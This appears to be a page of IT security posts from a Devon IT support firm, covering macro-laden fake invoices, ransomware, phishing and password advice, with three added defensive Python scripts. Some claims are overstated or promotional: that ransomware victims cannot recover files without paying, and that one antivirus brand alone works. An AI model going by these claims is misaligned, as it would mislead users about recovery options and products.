“As a local business, Lineal are always pleased to be able to attend the North Devon Show” explained Lineal’s managing director Mike Matthews: “the huge variety of enthusiastic local firms and organisations exhibiting here always make the day a success, and there’s always something new to see.”

Two days of rain beforehand didn’t dampen spirits, and the show itself was sunny and well attended by thousands of both North Devon locals and tourists to the area.

We’ll see you next year!

For IT Support, systems and software expertise – contact Lineal today.


Fake Invoices – Don’t enable document malware!

fake invoices

This week’s IT security alert from Lineal – fake invoices which ask users to run a dangerous piece of code.

The example above comes from a fake Word document emailed with a typical text line, such as ‘Please check this invoice’ or ‘Double check my numbers for me’, to an unsuspecting user.

Upon opening, the document appears to load a popup from Office 2016 prompting the user to ‘Enable Content’ for compatibility purposes, before they can view the detail of the ‘invoice.’

In fact, the display is just an image within the Word file, and the ‘Enable Content’ button instead runs a piece of Visual Basic code downloading unknown malware from the internet.

The scam relies on users’ curiosity at the unusual $1999.00 charge, and upon reaching a user still running an outdated version of Microsoft Office.

 

Several measures can be taken to prevent this kind of attack:

  • Don’t click any popup that doesn’t visibly pop ‘open’ in Microsoft Office, and don’t ‘Enable Content’ you can’t see in a document.
  • Consider an email filtering service like Barracuda – in the above example, Barracuda had recognised this email as malicious and stripped the code from the document before placing it in the correct email inbox for the intended recipient.
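As an added example (not Lineal’s or Barracuda’s own code), the following Python script shows how a mail gateway could triage a Word attachment for the two things the scam above depends on: a VBA macro project inside the file, and a document body made almost entirely of one embedded picture. The sample documents it inspects are constructed in memory, and the image-ratio threshold is an assumption chosen for the example.

```python
"""Triage a Word attachment for the warning signs the fake-invoice scam relies on.

Added example, not Lineal's or Barracuda's code. It opens the OOXML zip
container used by .docx/.docm files, reports whether a VBA project part is
present (so 'Enable Content' could run code) and flags a file whose content
is almost entirely one embedded image, which is how the fake popup is drawn.
"""
import io
import zipfile

# Part names and content type defined by the OOXML packaging format
CONTENT_TYPES = "[Content_Types].xml"
VBA_PART = "word/vbaProject.bin"
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
MEDIA_PREFIX = "word/media/"
IMAGE_RATIO_THRESHOLD = 0.9  # assumption for this example; tune for your mail flow


def inspect_word_attachment(data: bytes) -> dict:
    """Return warning signs found in the bytes of a Word attachment.

    verdict is 'block' (carries macros), 'review' (not OOXML, or almost
    entirely an image) or 'ok'.
    """
    result = {"is_ooxml": False, "has_vba": False, "media": [],
              "image_ratio": 0.0, "verdict": "ok"}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        # Legacy binary .doc or something that is not a document at all:
        # a human should look before it reaches the recipient.
        result["verdict"] = "review"
        return result
    names = zf.namelist()
    if CONTENT_TYPES not in names:
        result["verdict"] = "review"
        return result
    result["is_ooxml"] = True
    content_types = zf.read(CONTENT_TYPES).decode("utf-8", "replace")
    # Either the part itself or its declared content type is enough:
    # a .docm renamed to .docx still carries the VBA project.
    result["has_vba"] = VBA_PART in names or VBA_CONTENT_TYPE in content_types
    infos = zf.infolist()
    total = sum(i.file_size for i in infos) or 1  # uncompressed sizes
    media = [(i.filename, i.file_size) for i in infos
             if i.filename.startswith(MEDIA_PREFIX)]
    result["media"] = media
    result["image_ratio"] = sum(size for _, size in media) / total
    if result["has_vba"]:
        result["verdict"] = "block"
    elif result["image_ratio"] > IMAGE_RATIO_THRESHOLD:
        result["verdict"] = "review"
    return result


def build_sample_docx(with_macro: bool, image_bytes: int = 0) -> bytes:
    """Construct a minimal OOXML container in memory (test fixture, not a real invoice)."""
    main_ct = ("application/vnd.openxmlformats-officedocument."
               "wordprocessingml.document.main+xml")
    overrides = ['<Override PartName="/word/document.xml" ContentType="%s"/>' % main_ct]
    if with_macro:
        overrides.append('<Override PartName="/%s" ContentType="%s"/>'
                         % (VBA_PART, VBA_CONTENT_TYPE))
    types_xml = ('<?xml version="1.0" encoding="UTF-8"?>'
                 '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                 + "".join(overrides) + "</Types>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(CONTENT_TYPES, types_xml)
        zf.writestr("word/document.xml", "<w:document/>")  # placeholder body
        if image_bytes:
            # Constructed PNG-like payload standing in for the popup screenshot
            zf.writestr("word/media/image1.png", b"\x89PNG" + b"\0" * image_bytes)
        if with_macro:
            # Constructed placeholder bytes standing in for a real OLE VBA project
            zf.writestr(VBA_PART, b"\xd0\xcf\x11\xe0" + b"\0" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("macro invoice", build_sample_docx(True, 4000)),
                       ("image-only invoice", build_sample_docx(False, 50000)),
                       ("plain document", build_sample_docx(False))):
        print(label, "->", inspect_word_attachment(doc)["verdict"])
```

A filtering service would quarantine the 'block' case and hold the 'review' case for a human, which is the same outcome the Barracuda example above achieved by stripping the macro before delivery.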

 

For IT Security advice and guidance – speak to Lineal today.


You spoke, we listened – Results of the Lineal Client Feedback Survey 2016


It’s that time of year again – when we ask you how we’ve been doing, and what Lineal can do to improve the quality of our technical support.

Firstly, a big thank you to those of you with kind words to say about members of our IT help desk. Our team found your kind comments to be enormously supportive and it’s good to know that so many of our customers value the contribution of their account manager so highly.

83% of you felt we met the technology needs of small to medium size businesses ‘Well’ or ‘Very Well’, and 89% felt we understood your IT queries ‘Very Well’ or ‘Extremely Well.’ Overall, 85% of you rated our customer support ‘Good’ or ‘Great.’

We weren’t perfect however – some of you felt we’d been slower to respond to certain emails and call-backs recently, and we’re putting in place new measures to address this: we’ll be adding to our team in coming weeks to help manage our responsibilities to our ever-growing number of IT support clients, and to ensure clearer communication between our team and customers during ongoing project work.

Your comments included an insightful mix of both praise and constructive criticism which we’re reviewing carefully – but here were a few of our favourites:

  • “A good “local” company. Always on hand.”
  • “As a small organisation of mainly non IT literate users Lineal staff always respond to queries in language we understand and without making us feel stupid!”
  • “Would like to thank Martyn especially, and dealing with mostly one person simplifies things.”

Thank you to everyone who gave us their feedback, it will inform our future decision making and help us provide a high quality of customer support.


Windows Server 2003 vulnerability for 1 in 5 businesses


Nearly 1 in 5 Windows Server users are still running Windows Server 2003, at great risk, more than a year after Microsoft announced the end of security support for the product, new findings have shown.

Research by Spiceworks and Cloudphysics both found that 18% of Windows Server licensing market share is still taken up by Windows Server 2003, based on data recorded in June 2016. More than 53% of those surveyed also still ran one or more instances of Windows Server 2003 somewhere in their organisation.

Anyone still using the old software risks becoming vulnerable to security threats, which Microsoft will no longer address, with many organisations potentially being in violation of their compliance, insurance or regulatory obligations for data protection.

The continuation of Windows Server 2003 (which Tech Radar last year touted as potentially “the biggest security threat of 2015”) has been left unresolved within many companies, many of whom believe they lack a clear decision, expertise, or funds to replace the now unsupported operating system.

In the short term the best measure is risk mitigation: isolate any Windows Server 2003 systems as much as possible to prevent access by outside security threats.

But sooner or later, all companies will need to upgrade important systems, and those that do make the move are less likely to invest in the capital expense of physical hardware as they were over a decade ago – with increasing numbers likely to utilise an outside IT provider to migrate to a managed virtualised solution, for example business cloud services.

For Windows licensing support or guidance, please contact Lineal today – 01271 375999 or click here.


Zepto Cryptolocker Alert: Lineal intercepts dangerous zero-day threat with ESET Antivirus


Yesterday Lineal’s team successfully rescued a client from a new ‘zero-day’ Cryptolocker Virus which nearly destroyed many of their files.

The dangerous variation of the ‘Zepto’ cryptolocker, only identified online during the last 24 hours, is believed to be a brand new threat originally derived from ‘Locky’ ransomware.

An employee at one of Lineal’s IT support clients recently opened an email containing an infected file – a malicious piece of obfuscated code written in Visual Basic scripting language. The installed Zepto cryptolocker began encrypting the company’s files, readying to demand a heavy ransom.

In a coordinated attack, an outside user also forced access to our client’s server, instructing it to begin sending fake Barclays ‘phishing’ emails, attempting to criminally capture banking details.

Our team caught both threats early, forcefully locking out the intruder in mid-session, identifying the employee who introduced the threat, and quarantining the infection with ESET’s business endpoint security.

Lineal then notified ESET about Zepto to help with future identification, having avoided the need to restore all the client’s files from backup at great disruption.

The landscape of online security threats is rapidly changing, and Cryptolocker variants have spread quickly in recent months.

In this case Lineal’s rapidly responding team and professional security software helped our client dodge the huge potential losses from the security breach – and highlighted how vital it is that organisations of all sizes take proactive steps to protect their IT from hostile intrusion.

 

For IT security advice and support, contact Lineal today.


One in four PCs running outdated versions of Internet Explorer


New research by security company Duo has suggested that as many as 25% of Windows PC users are running out of date versions of Microsoft Internet Explorer.

Among Windows XP legacy users the problem is particularly acute, with more than half still running Internet Explorer 7 or 8, rather than upgrading to version 11.

Duo suggest this is putting thousands of PC users at risk of exposure to over 700 security risks caused by known viruses, malware or other online threats via their now outdated and unsupported web browser. In particular, un-patched exploits via popular third-party plugins such as video player codecs pose a likely danger.

Microsoft are currently offering Internet Explorer’s latest replacement, the superior Microsoft Edge, free to every user with a Windows 7 license who chooses to upgrade their PC to Windows 10 before the 30th of July deadline.

Alternatively, users should consider the pushier update-reminding Mozilla Firefox, or Google’s automatically updating Google Chrome offering, alongside tried and trusted security software (such as the excellent ESET NOD32 Antivirus), to ensure that the technology they use for private data transfers such as email and online banking remains private.

Contact Lineal today for IT advice and support: 01271 375999 or email [email protected]


Phishing Emails that know your home address spread

 

Hundreds of people have received a new type of phishing email which knows the individual’s home address.

Clicking the link in the dangerous email, which appears to be a very authentic request to pay an overdue invoice, installs devastating cryptolocker ‘ransomware’ on the user’s computer.

The virus then begins encrypting files, demanding a ransom be paid to unlock the user’s data.

According to the BBC the unconnected company cited in the email, cotton fabric manufacturer British Millerain Co Ltd, have received more than 150 phone calls from individuals concerned that they owe money.

Phishing emails and websites, which typically mimic official bank or company communications to trick vulnerable users into making payments to criminals, are becoming increasingly sophisticated.

The use of an individual’s personal address, and higher quality written English, suggests the original creator of the email has gone to greater lengths to make the email look convincing and to avoid detection.

It is also likely that the matching address originates from stolen, legitimate customer data, accounting for users’ recognition of the way they write their own home contact details.

New threats are constantly developing, and Lineal recommend installing an antivirus software with a strong record of catching emerging online threats – such as ESET.

 

Always follow some simple rules:

  • Never click a link or open an attachment from any suspicious email whose origins you do not recognise.
  • Banks and similar will NEVER request your private passwords, pin numbers or other confidential information. Do not disclose these to anyone.
  • If hit by cryptolocker style ransomware, every second counts – seek professional technical support immediately.
  • Always keep a regular, separate backup of your files.

 

Photo Credit: BBC News


WhatsApp Encryption Launches

 

Popular messaging app WhatsApp have launched end-to-end WhatsApp encryption for over one billion users.

The new security capabilities introduced by the Facebook owned company ensure that every message remains encrypted during transmission, preventing even WhatsApp from reading user data.

With encryption and technological privacy issues regularly appearing in recent news headlines, the WhatsApp encryption upgrade comes at just the right moment for the security concerned, after more than two years of delays in development across multiple platforms.

Much like during Apple’s recent legal dispute with the FBI, the move would also prevent the release of confidential user data following a court order. According to reports from the New York Times, the technology provider have been reported to already be in a longstanding dispute with the US Department of Justice over user data.

WhatsApp are making it clear they support absolute user privacy, with “not even WhatsApp” able to read the encrypted data, and users able to verify their connections are secure via a 60 digit or QR code swap.

From today, the WhatsApp conversation screen will now display an official notification to all users – confirming that their messages are encrypted successfully.

 

For hardware and software security advice – contact Lineal today.


Cryptolocker Warning from Lineal

 

Cryptolocker Warning: in the past fortnight we’ve seen an increasing number of companies hit by sophisticated cryptolocker viruses.

These dangerous programs, often installed by accident, lock your files over time, encrypting data and eventually demanding victims pay a ransom to retrieve their irreplaceable data.

In all of these cases, security products were installed but they did not protect against the threat. In our experience the only product that is reliably detecting these new threats and offering sufficient protection at this time is ESET. Older, less effective or out of date security products are offering little or no protection against these new cryptolocker variants.

Once affected by a cryptolocker, there is no way to decrypt scrambled files without paying the ransom, and users must remove the trojan before recovering recent versions of a file from their backups – highlighting the importance of a regular backup plan for data.

Please don’t be the next one to get caught out – talk to Lineal today about IT security options to ensure your valuable data is protected.

 


The Windows 10 update you didn’t notice

 


With ‘Windows 10.1’ now barely a month old, and the Microsoft operating system already running on over 12 million business PCs, how fares Microsoft’s free updates strategy?

The Windows 10.1 update, released with relatively little fanfare (be honest, you didn’t notice), adds features that, understandably with hindsight, might have been a distraction at the main Windows 10 release back in July.

Packaged within were mainly performance and security upgrades – Windows 10.1 will now boot almost 30% faster than an old Windows 7 system on the same device, the Cortana virtual assistant has some new handwriting recognition skills and there are new enterprise tools for mobile devices. Microsoft Edge runs smoother too, offering previews of tabs before viewing and syncing favourites across devices.

Most importantly, after recent corporate data breaches in the news, Microsoft have added a range of new security safeguards. These include ‘Windows Hello’, supporting enterprise grade biometrics including fingerprint and facial recognition – sadly currently only available for US users.

Aside from controversy surrounding user privacy then (if you didn’t notice your Windows 10.1 update, that’s maybe because Microsoft installed it automatically on your device without asking you) the first free update went ahead with relevant additions and limited fuss.

Starting free updates officially moves Microsoft into line with Apple’s OS X business model that has become the industry standard. Yet limited promotion of Windows 10’s ongoing development risks downplaying Microsoft’s progress.

Which would be unfair, because Microsoft is plainly taking extra care to develop the business security of their product range, including the excellent Office365, Microsoft Azure and now Windows 10.1. Microsoft is clearly listening to businesses’ fears, and businesses should welcome it.

 

For help and support with Microsoft enterprise IT, contact Lineal today.


Keeping your business IT secure – What’s the perfect password?


How to keep your IT Secure

Data breaches can lead to a massive loss of trust among customers, so how do you ensure your IT remains secure?

Despite what many online sign-up forms would suggest, the ‘strongest’ password is not necessarily long and complicated. Whilst complexity makes a password harder to guess or crack with a ‘brute force’ testing of combinations, most security breaches occur from stolen passwords, either physically or by malware attacks.

Very complex passwords do not help in this respect: users still need other IT security, such as antivirus software, errors are more common when typing (particularly on handheld devices) and employees may find complex passwords harder to remember – undermining data security by writing down their login details. The ubiquitous sticky note attached to the monitor is still a trusted solution to working with complex password policies in some organisations!

Routine password changes are a sensible precaution for most businesses, but can make it harder for employees to remember their passwords, leading to the same problem in which users are locked out of work accounts, copy passwords across accounts, or write passwords down at risk of theft.

Phrases can help avoid this problem by making passwords easier to recall: ‘Lineal15theB3st’ is preferable to a 15-digit numeral because a touch of personality adds memorability. Beware profanity though – just imagine trying to explain it to technical support later on!

Here at Lineal we’d also advise against ‘Remember Me’ automated sign-in functions, as well as Windows 10’s new Wi-Fi password sharing feature ‘Wi-Fi Sense’, as these make your chosen password redundant.

If you want to see where the future of online security is going, follow the money: most online banking incorporates a two-stage authentication process, requiring both a password and a unique alert code texted to the customer’s mobile phone for identification. This is already a free optional setting for Google, Facebook, Twitter and other popular websites.
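The two-stage process described above has a server side that the post does not show: the site must generate the one-time code, hold it only long enough to be used, and check it safely. The following is an added example, not code from Lineal or from any bank or website named in the post. It implements that second stage in Python with an in-memory store: the code is drawn from a cryptographic random source, only its hash (bound to the user name) is kept, it expires, it is single-use, and it is voided after a few wrong guesses. The six-digit length, five-minute lifetime and three-attempt limit are assumed values, and delivering the code by text message is left to the caller.

```python
import hashlib
import hmac
import secrets
import time

CODE_DIGITS = 6          # six-digit code (assumed; the post gives no length)
CODE_LIFETIME_S = 300    # code valid for five minutes (assumed)
MAX_ATTEMPTS = 3         # wrong guesses before the code is voided (assumed)


class SecondFactor:
    """Server side of a text-message style second authentication stage.

    The store holds only a SHA-256 hash of each outstanding code, its expiry
    time and a remaining-attempt counter, so a leaked store does not reveal
    live codes. Sending the code to the customer's phone is out of scope:
    issue_code() returns it so the caller can deliver it.
    """

    def __init__(self, clock=time.time):
        self._clock = clock            # injectable for testing
        self._pending = {}             # user -> (code_hash, expires_at, attempts_left)

    @staticmethod
    def _hash(user: str, code: str) -> bytes:
        # Bind the hash to the user so a code issued to one account cannot be
        # presented for another.
        return hashlib.sha256(f"{user}:{code}".encode()).digest()

    def issue_code(self, user: str) -> str:
        # secrets.randbelow draws from the OS CSPRNG; zero-pad to a fixed width
        # so codes such as 004217 are as likely as any other.
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        expires_at = self._clock() + CODE_LIFETIME_S
        self._pending[user] = (self._hash(user, code), expires_at, MAX_ATTEMPTS)
        return code

    def verify_code(self, user: str, code: str) -> bool:
        entry = self._pending.get(user)
        if entry is None:
            return False                       # nothing outstanding for this user
        code_hash, expires_at, attempts_left = entry
        if self._clock() > expires_at:
            del self._pending[user]            # expired: discard and fail
            return False
        # Constant-time comparison of the stored and presented hashes.
        if hmac.compare_digest(code_hash, self._hash(user, code)):
            del self._pending[user]            # single use: a replay will fail
            return True
        attempts_left -= 1
        if attempts_left <= 0:
            del self._pending[user]            # too many wrong guesses: void the code
        else:
            self._pending[user] = (code_hash, expires_at, attempts_left)
        return False


if __name__ == "__main__":
    sf = SecondFactor()
    issued = sf.issue_code("alice")
    print("code sent to alice:", issued)
    print("wrong code accepted?", sf.verify_code("alice", "000000"))
    print("right code accepted?", sf.verify_code("alice", issued))
    print("replay accepted?", sf.verify_code("alice", issued))
```

The expiry and attempt limit matter as much as the randomness: a six-digit code has only a million possibilities, so without a guess cap the second stage could be exhausted by trial, and without an expiry a code read over someone's shoulder stays useful indefinitely.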

Lineal’s advice is to stick to the following basics:

Avoid physical theft:

  • Don’t write your passwords down on a post-it note on your desk! Microsoft has a practical tip: if you absolutely must write a password down, do so in a safe place, without labelling it as a password or noting which account it refers to. Substitute words should also be used to hide the true password, for example writing ‘Fruit8£’ could refer to a password of ‘Apple8£’.
  • Don’t use an easily guessed word, such as your name, your company’s name, 1234, the name of something on your desk, the word ‘password’, or anything similarly obvious.
  • Never tell anyone your password, and change your password if you suspect it has been compromised.
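The rules above, together with the earlier points about brute force and memorable phrases, can be expressed as a simple check run before a password is accepted. The following is an added example, not Lineal's code or any product's policy engine. It rejects the easily guessed cases the post lists (the word ‘password’, 1234-style sequences, the user's or company's name with a few digits tacked on, digits only) and estimates the brute-force search space in bits, which makes the post's comparison concrete: ‘Lineal15theB3st’ draws on upper- and lower-case letters and digits and comes out near 89 bits, whereas a 15-digit numeral comes out near 50. The common-password list is a constructed illustration, and the 12-character minimum is an assumed figure, not one from the post.

```python
import math
import re

# Constructed denylist of obviously guessable passwords (illustrative only;
# a real deployment would check against a far larger list).
COMMON_PASSWORDS = {
    "password", "passw0rd", "123456", "12345678", "1234", "qwerty",
    "letmein", "welcome", "admin",
}

# Characters treated as "special" when estimating the character pool.
SPECIALS = set("!\"#£$%&'()*+,-./:;<=>?@[\\]^_`{|}~ ")

MIN_LENGTH = 12   # assumed minimum; the post does not specify one


def keyspace_bits(password: str) -> float:
    """Estimate the brute-force search space of a password in bits.

    The pool is the sum of the character classes actually present (lower,
    upper, digit, special) and bits = length * log2(pool). This is the cost
    of the 'testing every combination' attack the post refers to; it says
    nothing about how guessable the password is from knowledge of its owner.
    """
    pool = 0
    if any(c.islower() for c in password):
        pool += 26
    if any(c.isupper() for c in password):
        pool += 26
    if any(c.isdigit() for c in password):
        pool += 10
    if any(c in SPECIALS for c in password):
        pool += len(SPECIALS)
    return 0.0 if pool == 0 else len(password) * math.log2(pool)


def _is_sequence(s: str) -> bool:
    """True for runs such as '1234', '4321' or 'abcd' (each char +/-1 from the last)."""
    diffs = {ord(b) - ord(a) for a, b in zip(s, s[1:])}
    return diffs in ({1}, {-1})


def check_password(password: str, *, user_name: str = "", company: str = "") -> list[str]:
    """Return the reasons a password fails the post's basics; an empty list means it passes."""
    reasons = []
    lowered = password.lower()

    if lowered in COMMON_PASSWORDS:
        reasons.append("on the common-password list")

    # The user's or company's name with up to four digits and/or one symbol
    # appended, e.g. 'Lineal2015' or 'Alice1!'. A phrase that merely contains
    # the word (as 'Lineal15theB3st' does) is not caught by this rule.
    for word in (user_name, company):
        if word and re.fullmatch(re.escape(word.lower()) + r"\d{0,4}[^a-z0-9]?", lowered):
            reasons.append(f"is just '{word}' with digits or a symbol added")

    if password.isdigit():
        reasons.append("digits only: smallest possible search space")

    if len(password) >= 4 and _is_sequence(password):
        reasons.append("keyboard or number sequence such as 1234 or abcd")

    if len(password) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")

    return reasons


if __name__ == "__main__":
    for candidate in ("Lineal15theB3st", "123456789012345", "Lineal2015", "password"):
        verdict = check_password(candidate, user_name="alice", company="Lineal")
        print(f"{candidate!r}: {keyspace_bits(candidate):.1f} bits;",
              "OK" if not verdict else "; ".join(verdict))
```

The two functions deliberately measure different things: `keyspace_bits` only reflects resistance to exhaustive guessing, while `check_password` catches passwords that are trivially guessable however large their nominal search space. The post's point survives the arithmetic: a long mixed-character phrase scores well on both, but neither score protects a password that has been stolen.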

Ease of Access:

  • If you struggle to remember your passwords, use a password storage program to store some of them. Remember to use a secure password for the program.
  • Mitigate against your own forgetfulness by setting up alternate password recovery options, allowing you to choose more varied, difficult passwords.
  • Consider where users will need to log in from – take full advantage of numbers and special characters (!, £, %, * etc.) for keyboard users.

Preventing digital theft:

  • Use different passwords for your most important accounts, such as online banking.
  • Use two-stage authentication.
  • Maintain up to date anti-virus security software and firewalls on your work desktops, and don’t download untrusted software or open suspicious emails which could be phishing or contain password stealing malware.
  • Consult IT specialists to ensure office networks are protected from outside attacks.

Your security should always be strong enough to give peace of mind. Lineal can provide expert advice and support for securing your IT systems: why not get in contact with us here?


Flickr: Jason Baker